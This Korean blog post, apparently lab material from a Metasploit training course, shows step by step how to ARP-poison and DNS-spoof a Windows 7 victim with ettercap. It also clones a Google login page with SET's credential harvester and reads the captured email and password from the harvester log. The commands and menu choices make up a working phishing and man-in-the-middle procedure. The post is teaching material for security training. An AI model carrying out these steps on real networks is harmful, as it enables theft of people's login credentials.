정보보안(구버전)/Metasploit 2016. 6. 7. 17:42

Metasploit - 15. ARP&DNS Spoofing & Setoolkit (Fake Web 사이트 구성)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Window7

 

 

 - ettercap을 이용하여 Firewall과 Window7에 대해서 ARP/DNS 스푸핑을 실시한다.

 - setoolkit을 이용하여 Fake Web 사이트를 구성한 다음, ID/Password 정보 수집 테스트를 실시한다.

 

 

[실습 단계]

 

스캔 -> 공격 타겟 선정 -> ARP/DNS Spoofing 실시

 

Fake Web 사이트 구성 -> Fake Web 사이트 사용자 접속 -> 로그인 -> ID/Password 획득

 

 

 

Ex1) ARP/DNS 스푸핑 실시

 

 - IPv4 Forwarding 기능을 임시적으로 ON 실시

 

@ Kali Linux

 

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

 

 

 - ettercap DNS 설정 파일 내용 확인 (www.cisco.com - 192.168.20.50)

 

root@kali:~# vi /etc/ettercap/etter.dns

 

~ 중간 생략 ~

 

###############################################
# DNS Spoofing Test
#

www.cisco.com              A  192.168.20.50
*.cisco.com                A  192.168.20.50
www.cisco.com              PTR 192.168.20.50

###############################################
~ 중간 생략 ~

 

: q!

 

 

 

 - 'ettercap' 실행 (사용 방법 : http://net123.tistory.com/267)

 

root@kali:~# ettercap -G &

 

  ① Sniff -> Unified sniffing -> Network Interface : eth1 선택 -> 확인

 

  ② Hosts -> Scan for hosts 실시

 

  ③ Hosts -> Host List 클릭 -> 목록 확인

 

         - 192.168.20.100 -> Add to Target 1
         - 192.168.20.202 -> Add to Target 2

 

  ④ Mitm -> ARP poisoning -> Sniffi remote connections 체크 -> 확인


  ⑤ Plugins -> Manage the plugins -> dns_spoof 더블 클릭


  ⑥ Start -> Start snffing
 

 

 

 

Ex2) Fake Web 사이트 구성

 

@ Kali Linux

 

root@kali:~# setoolkit
~ 중간 생략 ~

 

 Select from the menu:

 

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

 

  99) Exit the Social-Engineer Toolkit

 

set> 1

~ 중간 생략 ~

 

Select from the menu:

 

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

 

  99) Return back to the main menu.

 

set> 2

~ 중간 생략 ~

 

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

 

  99) Return to Main Menu

 

set:webattack> 3

~ 중간 생략 ~


   1) Web Templates
   2) Site Cloner
   3) Custom Import

 

  99) Return to Webattack Menu

 

set:webattack> 1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.20.50

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo

 

set:webattack> Select a template: 2

 

[*] Cloning the website: http://www.google.com
[*] This could take a little bit...

 

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www


{Press return to continue} (엔터)

 

~ 중간 생략 ~

 

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

 

  99) Return to Main Menu

 

set:webattack> 99
~ 중간 생략 ~

 

set> 99
~ 중간 생략 ~

 

set> 99


 Thank you for shopping with the Social-Engineer Toolkit.

 

 Hack the Gibson...and remember...hugs are worth more than handshakes.

 

root@kali:~#

 

 

 

 - '/var/www/html' 디렉토리에 생성된 Google Fake 사이트 관련 파일 확인

 

root@kali:~# cd /var/www/html

root@kali:/var/www/html# ls
harvester_2016-06-07 16:22:05.629238.txt  index.html  post.php

 

 

 

 

Ex3) Window7에서 'http://www.cisco.com' 접속 테스트 실시

 

 - 파이어폭스를 이용하여 'http://www.cisco.com' 접속 실시 및 로그인 실시(abcd@test.com/abcd1234)

 

 

@ Window7

 

 

 

 

 

 

Ex4) Kali Linux에서 ID/Password 확인

 

@ Kali Linux

 

root@kali:/var/www/html# ls
harvester_2016-06-07 18:00:31.646217.txt  index.html  post.php

 


root@kali:/var/www/html#
root@kali:/var/www/html# cat harvester_*.txt | egrep '(Email|Passwd)'
    [Email] => abcd@test.com
    [Passwd] => abcd1234

 

 

root@kali:/var/www/html# rm *
root@kali:/var/www/html# cd
root@kali:~#

 

 

 

 

Ex5) 'Reverse TCP' 악성 코드 유입 (앞에 게시물을 참조하여 실시해 본다.)

 

 - 참고 : http://net123.tistory.com/297

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q